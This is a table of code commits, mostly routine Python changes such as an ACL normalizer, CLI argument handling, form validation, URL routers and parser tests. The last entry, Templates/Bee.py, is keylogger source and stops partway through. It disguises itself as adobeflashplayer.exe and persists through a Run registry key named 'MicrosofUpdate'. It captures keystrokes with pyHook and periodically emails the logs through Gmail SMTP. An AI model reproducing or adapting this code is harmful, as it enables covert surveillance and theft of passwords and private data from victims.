commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
|---|---|---|---|---|---|---|---|
480330a116a03ca79172a8646f9001f7f9ee5cad
|
Allow ACL sections to use .*-release group names
|
tools/normalize_acl.py
|
tools/normalize_acl.py
|
#!/usr/bin/env python
# Usage: normalize_acl.py acl.config [transformation [transformation [...]]]
#
# Transformations:
# all Apply all transformations.
# 0 - dry run (default, print to stdout rather than modifying file in place)
# 1 - strip/condense whitespace and sort (implied by any other transformation)
# 2 - get rid of unneeded create on refs/tags
# 3 - remove any project.stat{e,us} = active since it's a default or a typo
# 4 - strip default *.owner = group Administrators permissions
# 5 - sort the exclusiveGroupPermissions group lists
# 6 - replace openstack-ci-admins and openstack-ci-core with infra-core
# 7 - add at least one core team, if no team is defined with special suffixes
# like core, admins, milestone or Users
import re
import sys
aclfile = sys.argv[1]
try:
transformations = sys.argv[2:]
if transformations and transformations[0] == 'all':
transformations = [str(x) for x in range(0, 8)]
except KeyError:
transformations = []
def tokens(data):
"""Human-order comparison
This handles embedded positive and negative integers, for sorting
strings in a more human-friendly order."""
data = data.replace('.', ' ').split()
for n in range(len(data)):
try:
data[n] = int(data[n])
except ValueError:
pass
return data
acl = {}
out = ''
if '0' in transformations or not transformations:
dry_run = True
else:
dry_run = False
aclfd = open(aclfile)
for line in aclfd:
# condense whitespace to single spaces and get rid of leading/trailing
line = re.sub('\s+', ' ', line).strip()
# skip empty lines
if not line:
continue
# this is a section heading
if line.startswith('['):
section = line.strip(' []')
# use a list for this because some options can have the same "key"
acl[section] = []
# key=value lines
elif '=' in line:
acl[section].append(line)
# WTF
else:
raise Exception('Unrecognized line: "%s"' % line)
aclfd.close()
if '2' in transformations:
for key in acl:
if key.startswith('access "refs/tags/'):
acl[key] = [
x for x in acl[key]
if not x.startswith('create = ')]
if '3' in transformations:
try:
acl['project'] = [x for x in acl['project'] if x not in
('state = active', 'status = active')]
except KeyError:
pass
if '4' in transformations:
for section in acl.keys():
acl[section] = [x for x in acl[section] if x !=
'owner = group Administrators']
if '5' in transformations:
for section in acl.keys():
newsection = []
for option in acl[section]:
key, value = [x.strip() for x in option.split('=')]
if key == 'exclusiveGroupPermissions':
newsection.append('%s = %s' % (
key, ' '.join(sorted(value.split()))))
else:
newsection.append(option)
acl[section] = newsection
if '6' in transformations:
for section in acl.keys():
newsection = []
for option in acl[section]:
for group in ('openstack-ci-admins', 'openstack-ci-core'):
option = option.replace('group %s' % group, 'group infra-core')
newsection.append(option)
acl[section] = newsection
if '7' in transformations:
special_projects = (
'ossa',
'reviewday',
)
special_teams = (
'admins',
'committee',
'core',
'maint',
'Managers',
'milestone',
'packagers',
'Users',
)
for section in acl.keys():
newsection = []
for option in acl[section]:
if ('refs/heads' in section and 'group' in option
and '-2..+2' in option
and not any(x in option for x in special_teams)
and not any(x in aclfile for x in special_projects)):
option = '%s%s' % (option, '-core')
newsection.append(option)
acl[section] = newsection
for section in sorted(acl.keys()):
if acl[section]:
out += '\n[%s]\n' % section
for option in sorted(acl[section], key=tokens):
out += '%s\n' % option
if dry_run:
print(out[1:-1])
else:
aclfd = open(aclfile, 'w')
aclfd.write(out[1:])
aclfd.close()
|
Python
| 0.000004
|
@@ -3626,32 +3626,51 @@
'packagers',%0A
+ 'release',%0A
'Users',
|
edd9800b807482097edba03d433bb097fd07dae1
|
Add aliases
|
ckanext/archiver/model.py
|
ckanext/archiver/model.py
|
from builtins import str
from builtins import object
import uuid
from datetime import datetime
from sqlalchemy import Column, MetaData
from sqlalchemy import types
from sqlalchemy.ext.declarative import declarative_base
import ckan.model as model
import ckan.plugins as p
from ckan.lib import dictization
log = __import__('logging').getLogger(__name__)
Base = declarative_base()
def make_uuid():
return str(uuid.uuid4())
metadata = MetaData()
# enum of all the archival statuses (singleton)
# NB Be very careful changing these status strings. They are also used in
# ckanext-qa tasks.py.
class Status(object):
_instance = None
def __init__(self):
not_broken = {
# is_broken = False
0: 'Archived successfully',
1: 'Content has not changed',
}
broken = {
# is_broken = True
10: 'URL invalid',
11: 'URL request failed',
12: 'Download error',
}
not_sure = {
# is_broken = None i.e. not sure
21: 'Chose not to download',
22: 'Download failure',
23: 'System error during archival',
}
self._by_id = dict(not_broken, **broken)
self._by_id.update(not_sure)
self._by_text = dict((value, key)
for key, value in self._by_id.items())
@classmethod
def instance(cls):
if not cls._instance:
cls._instance = cls()
return cls._instance
@classmethod
def by_text(cls, status_txt):
return cls.instance()._by_text[status_txt]
@classmethod
def by_id(cls, status_id):
return cls.instance()._by_id[status_id]
@classmethod
def is_status_broken(cls, status_id):
if status_id < 10:
return False
elif status_id < 20:
return True
else:
return None # not sure
@classmethod
def is_ok(cls, status_id):
return status_id in [0, 1]
broken_enum = {True: 'Broken',
None: 'Not sure if broken',
False: 'Downloaded OK'}
class Archival(Base):
"""
Details of the archival of resources. Has the filepath for successfully
archived resources. Basic error history provided for unsuccessful ones.
"""
__tablename__ = 'archival'
id = Column(types.UnicodeText, primary_key=True, default=make_uuid)
package_id = Column(types.UnicodeText, nullable=False, index=True)
resource_id = Column(types.UnicodeText, nullable=False, index=True)
resource_timestamp = Column(types.DateTime) # key to resource_revision
# Details of the latest archival attempt
status_id = Column(types.Integer)
is_broken = Column(types.Boolean) # Based on status_id. None = not sure
reason = Column(types.UnicodeText) # Extra detail explaining the status (cannot be translated)
url_redirected_to = Column(types.UnicodeText)
# Details of last successful archival
cache_filepath = Column(types.UnicodeText)
cache_url = Column(types.UnicodeText)
size = Column(types.BigInteger, default=0)
mimetype = Column(types.UnicodeText)
hash = Column(types.UnicodeText)
etag = Column(types.UnicodeText)
last_modified = Column(types.UnicodeText)
# History
first_failure = Column(types.DateTime)
last_success = Column(types.DateTime)
failure_count = Column(types.Integer, default=0)
created = Column(types.DateTime, default=datetime.now)
updated = Column(types.DateTime)
def __repr__(self):
broken_details = '' if not self.is_broken else \
('%d failures' % self.failure_count)
package = model.Package.get(self.package_id)
package_name = package.name if package else '?%s?' % self.package_id
return '<Archival %s /dataset/%s/resource/%s %s>' % \
(broken_enum[self.is_broken], package_name, self.resource_id,
broken_details)
@classmethod
def get_for_resource(cls, resource_id):
'''Returns the archival for the given resource, or if it doens't exist,
returns None.'''
return model.Session.query(cls).filter(cls.resource_id == resource_id).first()
@classmethod
def get_for_package(cls, package_id):
'''Returns the archivals for the given package. May not be any if the
package has no resources or has not been archived. It checks the
resources are not deleted.'''
return model.Session.query(cls) \
.filter(cls.package_id == package_id) \
.join(model.Resource, cls.resource_id == model.Resource.id) \
.filter(model.Resource.state == 'active') \
.all()
@classmethod
def create(cls, resource_id):
c = cls()
c.resource_id = resource_id
# Find the package_id for the resource.
dataset = model.Session.query(model.Package)
if p.toolkit.check_ckan_version(max_version='2.2.99'):
# earlier CKANs had ResourceGroup
dataset = dataset.join(model.ResourceGroup)
dataset = dataset \
.join(model.Resource) \
.filter_by(id=resource_id) \
.one()
c.package_id = dataset.id
return c
@property
def status(self):
if self.status_id is None:
return None
return Status.by_id(self.status_id)
def as_dict(self):
context = {'model': model}
archival_dict = dictization.table_dictize(self, context)
archival_dict['status'] = self.status
archival_dict['is_broken_printable'] = broken_enum[self.is_broken]
return archival_dict
def aggregate_archivals_for_a_dataset(archivals):
'''Returns aggregated archival info for a dataset, given the archivals for
its resources (returned by get_for_package).
:param archivals: A list of the archivals for a dataset's resources
:type archivals: A list of Archival objects
:returns: Archival dict about the dataset, with keys:
status_id
status
reason
is_broken
'''
archival_dict = {'status_id': None, 'status': None,
'reason': None, 'is_broken': None}
for archival in archivals:
# status_id takes the highest id i.e. pessimistic
# reason matches the status_id
if archival_dict['status_id'] is None or \
archival.status_id > archival_dict['status_id']:
archival_dict['status_id'] = archival.status_id
archival_dict['reason'] = archival.reason
if archivals:
archival_dict['status'] = Status.by_id(archival_dict['status_id'])
archival_dict['is_broken'] = \
Status.is_status_broken(archival_dict['status_id'])
return archival_dict
def init_tables(engine):
Base.metadata.create_all(engine)
log.info('Archiver database tables are set-up')
|
Python
| 0.000033
|
@@ -1,28 +1,108 @@
+from future import standard_library%0Astandard_library.install_aliases() # noqa%0A%0A
from builtins import str%0Afro
|
a5a25c180f2df13c387c56be938b3ecad2a50aaa
|
use action='version' in --version parser (#891)
|
cli/cook/cli.py
|
cli/cook/cli.py
|
import argparse
import logging
from urllib.parse import urlparse
from cook import util, http, metrics, version, configuration
from cook.subcommands import submit, show, wait, jobs, ssh, ls, tail, kill, config, cat, usage
from cook.util import deep_merge
parser = argparse.ArgumentParser(description='cs is the Cook Scheduler CLI')
parser.add_argument('--cluster', '-c', help='the name of the Cook scheduler cluster to use')
parser.add_argument('--url', '-u', help='the url of the Cook scheduler cluster to use')
parser.add_argument('--config', '-C', help='the configuration file to use')
parser.add_argument('--silent', '-s', help='silent mode', dest='silent', action='store_true')
parser.add_argument('--verbose', '-v', help='be more verbose/talkative (useful for debugging)',
dest='verbose', action='store_true')
parser.add_argument('--version', help='output version information and exit', dest='version', action='store_true')
subparsers = parser.add_subparsers(dest='action')
actions = {
'cat': cat.register(subparsers.add_parser, configuration.add_defaults),
'config': config.register(subparsers.add_parser, configuration.add_defaults),
'jobs': jobs.register(subparsers.add_parser, configuration.add_defaults),
'kill': kill.register(subparsers.add_parser, configuration.add_defaults),
'ls': ls.register(subparsers.add_parser, configuration.add_defaults),
'show': show.register(subparsers.add_parser, configuration.add_defaults),
'ssh': ssh.register(subparsers.add_parser, configuration.add_defaults),
'submit': submit.register(subparsers.add_parser, configuration.add_defaults),
'tail': tail.register(subparsers.add_parser, configuration.add_defaults),
'usage': usage.register(subparsers.add_parser, configuration.add_defaults),
'wait': wait.register(subparsers.add_parser, configuration.add_defaults)
}
def load_target_clusters(config_map, url=None, cluster=None):
"""Given the config and (optional) url and cluster flags, returns the list of clusters to target"""
if cluster and url:
raise Exception('You cannot specify both a cluster name and a cluster url at the same time')
clusters = None
config_clusters = config_map.get('clusters')
if url:
if urlparse(url).scheme == '':
url = 'http://%s' % url
clusters = [{'name': url, 'url': url}]
elif config_clusters:
if cluster:
clusters = [c for c in config_clusters if c.get('name').lower() == cluster.lower()]
else:
clusters = [c for c in config_clusters if 'disabled' not in c or not c['disabled']]
return clusters
def run(args):
"""
Main entrypoint to the cook scheduler CLI. Loads configuration files,
processes global command line arguments, and calls other command line
sub-commands (actions) if necessary.
"""
args = vars(parser.parse_args(args))
print_version = args.pop('version')
if print_version:
print(f'cs version {version.VERSION}')
return 0
util.silent = args.pop('silent')
verbose = args.pop('verbose') and not util.silent
log_format = '%(asctime)s [%(levelname)s] [%(name)s] %(message)s'
if verbose:
logging.getLogger('').handlers = []
logging.basicConfig(format=log_format, level=logging.DEBUG)
else:
logging.disable(logging.FATAL)
logging.debug('args: %s' % args)
action = args.pop('action')
config_path = args.pop('config')
cluster = args.pop('cluster')
url = args.pop('url')
if action is None:
parser.print_help()
else:
config_map = configuration.load_config_with_defaults(config_path)
try:
metrics.initialize(config_map)
metrics.inc('command.%s.runs' % action)
clusters = load_target_clusters(config_map, url, cluster)
http.configure(config_map)
args = {k: v for k, v in args.items() if v is not None}
defaults = config_map.get('defaults')
action_defaults = (defaults.get(action) if defaults else None) or {}
result = actions[action](clusters, deep_merge(action_defaults, args), config_path)
logging.debug('result: %s' % result)
return result
finally:
metrics.close()
return None
|
Python
| 0
|
@@ -910,22 +910,73 @@
it',
- dest='version
+%0A version=f'%25(prog)s version %7Bversion.VERSION%7D
', a
@@ -982,26 +982,23 @@
action='
-store_true
+version
')%0A%0Asubp
@@ -2957,135 +2957,8 @@
))%0A%0A
- print_version = args.pop('version')%0A if print_version:%0A print(f'cs version %7Bversion.VERSION%7D')%0A return 0%0A%0A
|
94aed149fd39ba9a6dd6fcf5dcc44c6e4f2a09b9
|
fix imports
|
website_sale_search_clear/controllers.py
|
website_sale_search_clear/controllers.py
|
# -*- coding: utf-8 -*-
from openerp import http
from openerp.addons.website_sale.controllers.main import website_sale as controller
class WebsiteSale(controller):
@http.route()
def shop(self, page=0, category=None, search='', **post):
if category and search:
category = None
return super(WebsiteSale, self).shop(page, category, search, **post)
|
Python
| 0.000004
|
@@ -23,22 +23,19 @@
-%0Afrom o
-penerp
+doo
import
@@ -49,14 +49,11 @@
om o
-penerp
+doo
.add
@@ -93,25 +93,24 @@
import
-w
+W
ebsite
-_s
+S
ale as c
|
24a1bb4fed640a61caa1613cfe4da29a530a8efc
|
Fix enconding issue on Harvest Config validation
|
udata/harvest/forms.py
|
udata/harvest/forms.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from udata.forms import Form, fields, validators
from udata.i18n import lazy_gettext as _
from .actions import list_backends
from .models import VALIDATION_STATES, VALIDATION_REFUSED
__all__ = 'HarvestSourceForm', 'HarvestSourceValidationForm'
class HarvestConfigField(fields.DictField):
'''
A DictField with extras validations on known configurations
'''
def get_backend(self, form):
return next(b for b in list_backends() if b.name == form.backend.data)
def get_filter_specs(self, backend, key):
candidates = (f for f in backend.filters if f.key == key)
return next(candidates, None)
def get_feature_specs(self, backend, key):
candidates = (f for f in backend.features if f.key == key)
return next(candidates, None)
def pre_validate(self, form):
if self.data:
backend = self.get_backend(form)
# Validate filters
for f in (self.data.get('filters') or []):
if not ('key' in f and 'value' in f):
msg = 'A field should have both key and value properties'
raise validators.ValidationError(msg)
specs = self.get_filter_specs(backend, f['key'])
if not specs:
msg = 'Unknown filter key "{0}" for "{1}" backend'
msg = msg.format(f['key'], backend.name)
raise validators.ValidationError(msg)
if not isinstance(f['value'], specs.type):
msg = '"{0}" filter should of type "{1}"'
msg = msg.format(specs.key, specs.type.__name__)
raise validators.ValidationError(msg)
# Validate features
for key, value in (self.data.get('features') or {}).items():
if not isinstance(value, bool):
msg = 'A feature should be a boolean'
raise validators.ValidationError(msg)
if not self.get_feature_specs(backend, key):
msg = 'Unknown feature "{0}" for "{1}" backend'
msg = msg.format(key, backend.name)
raise validators.ValidationError(msg)
class HarvestSourceForm(Form):
name = fields.StringField(_('Name'), [validators.required()])
description = fields.MarkdownField(
_('Description'),
description=_('Some optionnal details about this harvester'))
url = fields.URLField(_('URL'), [validators.required()])
backend = fields.SelectField(_('Backend'), choices=lambda: [
(b.name, b.display_name) for b in list_backends()
])
owner = fields.CurrentUserField()
organization = fields.PublishAsField(_('Publish as'))
config = HarvestConfigField()
class HarvestSourceValidationForm(Form):
state = fields.SelectField(choices=VALIDATION_STATES.items())
comment = fields.StringField(_('Comment'),
[validators.RequiredIfVal('state',
VALIDATION_REFUSED
)])
|
Python
| 0
|
@@ -1502,32 +1502,110 @@
ationError(msg)%0A
+%0A f%5B'value'%5D = f%5B'value'%5D.encode('utf-8') #Fix encoding error%0A%0A
|
683ccc69c51a64146dda838ad01674ca3b95fccd
|
Remove useless hearing comments router
|
democracy/urls_v1.py
|
democracy/urls_v1.py
|
from django.conf.urls import include, url
from rest_framework_nested import routers
from democracy.views import (
CommentViewSet, ContactPersonViewSet, HearingViewSet, ImageViewSet, LabelViewSet, ProjectViewSet,
RootSectionViewSet, SectionCommentViewSet, SectionViewSet, UserDataViewSet, FileViewSet, ServeFileView
)
router = routers.DefaultRouter()
router.register(r'hearing', HearingViewSet, base_name='hearing')
router.register(r'users', UserDataViewSet, base_name='users')
router.register(r'comment', CommentViewSet, base_name='comment')
router.register(r'image', ImageViewSet, base_name='image')
router.register(r'section', RootSectionViewSet, base_name='section')
router.register(r'label', LabelViewSet, base_name='label')
router.register(r'contact_person', ContactPersonViewSet, base_name='contact_person')
router.register(r'project', ProjectViewSet, base_name='project')
router.register(r'file', FileViewSet, base_name='file')
hearing_comments_router = routers.NestedSimpleRouter(router, r'hearing', lookup='comment_parent')
hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')
section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')
urlpatterns = [
url(r'^', include(router.urls, namespace='v1')),
url(r'^', include(hearing_comments_router.urls, namespace='v1')),
url(r'^', include(hearing_child_router.urls, namespace='v1')),
url(r'^', include(section_comments_router.urls, namespace='v1')),
url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
|
Python
| 0
|
@@ -943,107 +943,8 @@
')%0A%0A
-hearing_comments_router = routers.NestedSimpleRouter(router, r'hearing', lookup='comment_parent')%0A%0A
hear
@@ -1387,78 +1387,8 @@
)),%0A
- url(r'%5E', include(hearing_comments_router.urls, namespace='v1')),%0A
|
1c789f0cfbc9384c256a55343f3172b628e55a12
|
Add test case for parser consume
|
pysmt/test/smtlib/test_parser_examples.py
|
pysmt/test/smtlib/test_parser_examples.py
|
#
# This file is part of pySMT.
#
# Copyright 2014 Andrea Micheli and Marco Gario
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from tempfile import mkstemp
from six.moves import cStringIO
import pysmt.logics as logics
from pysmt.test import TestCase, skipIfNoSolverForLogic, main
from pysmt.test.examples import get_example_formulae
from pysmt.smtlib.parser import SmtLibParser
from pysmt.smtlib.script import smtlibscript_from_formula
from pysmt.shortcuts import Iff
from pysmt.shortcuts import read_smtlib, write_smtlib
from pysmt.exceptions import PysmtSyntaxError
class TestSMTParseExamples(TestCase):
def test_parse_examples(self):
fs = get_example_formulae()
for (f_out, _, _, logic) in fs:
if logic == logics.QF_BV:
# See test_parse_examples_bv
continue
buf = cStringIO()
script_out = smtlibscript_from_formula(f_out)
script_out.serialize(outstream=buf)
#print(buf)
buf.seek(0)
parser = SmtLibParser()
script_in = parser.get_script(buf)
f_in = script_in.get_last_formula()
self.assertEqual(f_in.simplify(), f_out.simplify())
@skipIfNoSolverForLogic(logics.QF_BV)
def test_parse_examples_bv(self):
"""For BV we represent a superset of the operators defined in SMT-LIB.
We verify the correctness of the serialization process by
checking the equivalence of the original and serialized
expression.
"""
fs = get_example_formulae()
for (f_out, _, _, logic) in fs:
if logic != logics.QF_BV:
continue
buf_out = cStringIO()
script_out = smtlibscript_from_formula(f_out)
script_out.serialize(outstream=buf_out)
buf_in = cStringIO(buf_out.getvalue())
parser = SmtLibParser()
script_in = parser.get_script(buf_in)
f_in = script_in.get_last_formula()
self.assertValid(Iff(f_in, f_out))
def test_parse_examples_daggified(self):
fs = get_example_formulae()
for (f_out, _, _, logic) in fs:
if logic == logics.QF_BV:
# See test_parse_examples_daggified_bv
continue
buf_out = cStringIO()
script_out = smtlibscript_from_formula(f_out)
script_out.serialize(outstream=buf_out, daggify=True)
buf_in = cStringIO(buf_out.getvalue())
parser = SmtLibParser()
script_in = parser.get_script(buf_in)
f_in = script_in.get_last_formula()
self.assertEqual(f_in.simplify(), f_out.simplify())
@skipIfNoSolverForLogic(logics.QF_BV)
def test_parse_examples_daggified_bv(self):
fs = get_example_formulae()
for (f_out, _, _, logic) in fs:
if logic != logics.QF_BV:
# See test_parse_examples_daggified
continue
buf_out = cStringIO()
script_out = smtlibscript_from_formula(f_out)
script_out.serialize(outstream=buf_out, daggify=True)
buf_in = cStringIO(buf_out.getvalue())
parser = SmtLibParser()
script_in = parser.get_script(buf_in)
f_in = script_in.get_last_formula()
self.assertValid(Iff(f_in, f_out), f_in.serialize())
def test_dumped_logic(self):
# Dumped logic matches the logic in the example
fs = get_example_formulae()
for (f_out, _, _, logic) in fs:
buf_out = cStringIO()
script_out = smtlibscript_from_formula(f_out)
script_out.serialize(outstream=buf_out)
buf_in = cStringIO(buf_out.getvalue())
parser = SmtLibParser()
script_in = parser.get_script(buf_in)
for cmd in script_in:
if cmd.name == "set-logic":
logic_in = cmd.args[0]
if logic == logics.QF_BOOL:
self.assertEqual(logic_in, logics.QF_UF)
elif logic == logics.BOOL:
self.assertEqual(logic_in, logics.LRA)
else:
self.assertEqual(logic_in, logic, script_in)
break
else: # Loops exited normally
print("-"*40)
print(script_in)
def test_read_and_write_shortcuts(self):
fs = get_example_formulae()
fdi, tmp_fname = mkstemp()
os.close(fdi) # Close initial file descriptor
for (f_out, _, _, _) in fs:
write_smtlib(f_out, tmp_fname)
# with open(tmp_fname) as fin:
# print(fin.read())
f_in = read_smtlib(tmp_fname)
self.assertEqual(f_out.simplify(), f_in.simplify())
# Clean-up
os.remove(tmp_fname)
def test_incomplete_stream(self):
txt = """
(declare-fun A () Bool)
(declare-fun B () Bool)
(assert (and A
"""
parser = SmtLibParser()
with self.assertRaises(PysmtSyntaxError):
parser.get_script(cStringIO(txt))
if __name__ == "__main__":
main()
|
Python
| 0.000001
|
@@ -905,16 +905,27 @@
ibParser
+, Tokenizer
%0Afrom py
@@ -5716,16 +5716,442 @@
(txt))%0A%0A
+ def test_parse_consume(self):%0A smt_script = %22%22%22%0A (model%0A (define-fun STRING_cmd_line_arg_1_1000 () String %22AAAAAAAAAAAA%22)%0A )%0A %22%22%22%0A tokens = Tokenizer(cStringIO(smt_script), interactive=True)%0A parser = SmtLibParser()%0A tokens.consume()%0A tokens.consume()%0A next_token = tokens.consume()%0A tokens.add_extra_token(next_token)%0A tokens.consume()%0A%0A
if __nam
|
ad153499a3982182533033acfa17971a35d7a587
|
implement __eq__
|
capa/features/address.py
|
capa/features/address.py
|
import abc
from dncil.clr.token import Token
class Address(abc.ABC):
@abc.abstractmethod
def __lt__(self, other):
# implement < so that addresses can be sorted from low to high
...
@abc.abstractmethod
def __hash__(self):
# implement hash so that addresses can be used in sets and dicts
...
@abc.abstractmethod
def __repr__(self):
# implement repr to help during debugging
...
class AbsoluteVirtualAddress(int, Address):
"""an absolute memory address"""
def __new__(cls, v):
assert v >= 0
return int.__new__(cls, v)
def __repr__(self):
return f"absolute(0x{self:x})"
class RelativeVirtualAddress(int, Address):
"""a memory address relative to a base address"""
def __repr__(self):
return f"relative(0x{self:x})"
class FileOffsetAddress(int, Address):
"""an address relative to the start of a file"""
def __new__(cls, v):
assert v >= 0
return int.__new__(cls, v)
def __repr__(self):
return f"file(0x{self:x})"
class DNTokenAddress(Address):
"""a .NET token"""
def __init__(self, token: Token):
self.token = token
def __lt__(self, other):
return self.token.value < other.token.value
def __hash__(self):
return hash(self.token.value)
def __repr__(self):
return f"token(0x{self.token.value:x})"
class DNTokenOffsetAddress(Address):
"""an offset into an object specified by a .NET token"""
def __init__(self, token: Token, offset: int):
assert offset >= 0
self.token = token
self.offset = offset
def __lt__(self, other):
return (self.token.value, self.offset) < (other.token.value, other.offset)
def __hash__(self):
return hash((self.token.value, self.offset))
def __repr__(self):
return f"token(0x{self.token.value:x})+(0x{self.offset:x})"
class _NoAddress(Address):
def __lt__(self, other):
return False
def __hash__(self):
return hash(0)
def __repr__(self):
return "no address"
NO_ADDRESS = _NoAddress()
|
Python
| 0.00008
|
@@ -65,16 +65,82 @@
c.ABC):%0A
+ @abc.abstractmethod%0A def __eq__(self, other):%0A ...%0A%0A
@abc
@@ -1266,16 +1266,99 @@
token%0A%0A
+ def __eq__(self, other):%0A return self.token.value == other.token.value%0A%0A
def
@@ -1370,32 +1370,32 @@
_(self, other):%0A
-
return s
@@ -1802,16 +1802,130 @@
offset%0A%0A
+ def __eq__(self, other):%0A return (self.token.value, self.offset) == (other.token.value, other.offset)%0A%0A
def
@@ -2197,24 +2197,24 @@
fset:x%7D)%22%0A%0A%0A
-
class _NoAdd
@@ -2224,24 +2224,74 @@
s(Address):%0A
+ def __eq__(self, other):%0A return True%0A%0A
def __lt
|
e660953c1df2dc9de6b3038e4ddb1d77768b2b51
|
Correct pyhande dependencies (broken for some time)
|
tools/pyhande/setup.py
|
tools/pyhande/setup.py
|
from distutils.core import setup
setup(
name='pyhande',
version='0.1',
author='HANDE developers',
packages=('pyhande',),
license='Modified BSD license',
description='Analysis framework for HANDE calculations',
long_description=open('README.rst').read(),
requires=['numpy', 'pandas (>= 0.13)', 'pyblock',],
)
|
Python
| 0
|
@@ -280,16 +280,24 @@
(),%0A
+install_
requires
@@ -312,37 +312,49 @@
', '
-pandas (%3E= 0.13)', 'pyblock',
+scipy', 'pandas', 'pyblock', 'matplotlib'
%5D,%0A)
|
5aa16a2ebc8f13980534b5f530cd68a0c04c4c55
|
Fix failing test
|
nefertari_mongodb/tests/test_documents.py
|
nefertari_mongodb/tests/test_documents.py
|
import pytest
from mock import patch, Mock
import mongoengine as mongo
from nefertari.utils.dictset import dictset
from nefertari.json_httpexceptions import (
JHTTPBadRequest, JHTTPNotFound, JHTTPConflict)
from .. import documents as docs
from .. import fields
class TestDocumentHelpers(object):
@patch.object(docs.mongo.document, 'get_document')
def test_get_document_cls(self, mock_get):
mock_get.return_value = 'foo'
assert docs.get_document_cls('MyModel') == 'foo'
mock_get.assert_called_once_with('MyModel')
@patch.object(docs.mongo.document, 'get_document')
def test_get_document_cls_error(self, mock_get):
mock_get.side_effect = Exception()
with pytest.raises(ValueError) as ex:
docs.get_document_cls('MyModel')
mock_get.assert_called_once_with('MyModel')
assert str(ex.value) == '`MyModel` does not exist in mongo db'
def test_process_lists(self):
test_dict = dictset(
id__in='1, 2, 3',
name__all='foo',
other__arg='4',
yet_other_arg=5,
)
result_dict = docs.process_lists(test_dict)
expected = dictset(
id__in=['1', '2', '3'],
name__all=['foo'],
other__arg='4',
yet_other_arg=5,
)
assert result_dict == expected
def test_process_bools(self):
test_dict = dictset(
complete__bool='false',
other_arg=5,
)
result_dict = docs.process_bools(test_dict)
assert result_dict == dictset(complete=False, other_arg=5)
class TestBaseMixin(object):
def test_id_field(self):
class MyModel(docs.BaseDocument):
my_id = fields.IdField()
name = fields.StringField()
assert MyModel.id_field() == 'my_id'
def test_check_fields_allowed_not_existing_field(self):
class MyModel(docs.BaseDocument):
name = fields.StringField()
with pytest.raises(JHTTPBadRequest) as ex:
MyModel.check_fields_allowed(('id__in', 'name', 'description'))
assert "'MyModel' object does not have fields" in str(ex.value)
assert 'description' in str(ex.value)
assert 'name' not in str(ex.value)
def test_check_fields_allowed(self):
class MyModel(docs.BaseDocument):
name = fields.StringField()
try:
MyModel.check_fields_allowed(('id__in', 'name'))
except JHTTPBadRequest:
raise Exception('Unexpected JHTTPBadRequest exception raised')
def test_check_fields_allowed_dymanic_doc(self):
class MyModel(docs.BaseMixin, mongo.DynamicDocument):
name = fields.StringField()
try:
MyModel.check_fields_allowed(('id__in', 'name', 'description'))
except JHTTPBadRequest:
raise Exception('Unexpected JHTTPBadRequest exception raised')
def test_filter_fields(self):
class MyModel(docs.BaseDocument):
name = fields.StringField()
params = MyModel.filter_fields(dictset(
description='nice',
name='regular name',
id__in__here=[1, 2, 3],
))
assert params == dictset(
name='regular name',
id__in__here=[1, 2, 3],
)
def test_apply_fields(self):
query_set = Mock()
_fields = ['name', 'id', '-title']
docs.BaseDocument.apply_fields(query_set, _fields)
query_set.only.assert_called_once_with('name', 'id')
query_set.only().exclude.assert_called_once_with('title')
def test_apply_sort(self):
query_set = Mock()
docs.BaseDocument.apply_sort(query_set, ['name', 'id'])
query_set.order_by.assert_called_once_with('name', 'id')
def test_apply_sort_no_sort(self):
query_set = Mock()
docs.BaseDocument.apply_sort(query_set, [])
assert not query_set.order_by.called
def test_count(self):
query_set = Mock()
docs.BaseDocument.count(query_set)
query_set.count.assert_called_once_with(
with_limit_and_skip=True)
|
Python
| 0.000209
|
@@ -1782,32 +1782,48 @@
lds.StringField(
+primary_key=True
)%0A%0A asser
@@ -1847,21 +1847,20 @@
d() == '
-my_id
+name
'%0A%0A d
|
776c8fd802385ef4294112e76365df6bdf93476a
|
Update Bee.py
|
Templates/Bee.py
|
Templates/Bee.py
|
import pythoncom
import pyHook
from os import path
from sys import exit
from sys import argv
from shutil import copy
import threading
import urllib,urllib2
import smtplib
import datetime,time
import win32com.client
import win32event, win32api, winerror
from _winreg import *
mutex = win32event.CreateMutex(None, 1, 'N0tAs519ns')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "err"
exit(0)
x=''
data=''
count=0
dir = "C:\\Users\\Public\\Libraries\\adobeflashplayer.exe"
def startup():
copy(argv[0],dir)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosofUpdate",0, REG_SZ, dir)
if path.isfile(dir) == False:
startup()
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>50:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER = EEMAIL
PASS = EPASS
FROM = USER
TO = [USER]
SUBJECT = "B33: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
def main():
global x
em4=TimerClass()
em4.start()
return True
if __name__ == '__main__':
main()
def pushing(event):
global x,data
if event.Ascii==13:
e4Ch=' [ENTER] '
elif event.Ascii==8:
e4Ch=' [BACKSPACE] '
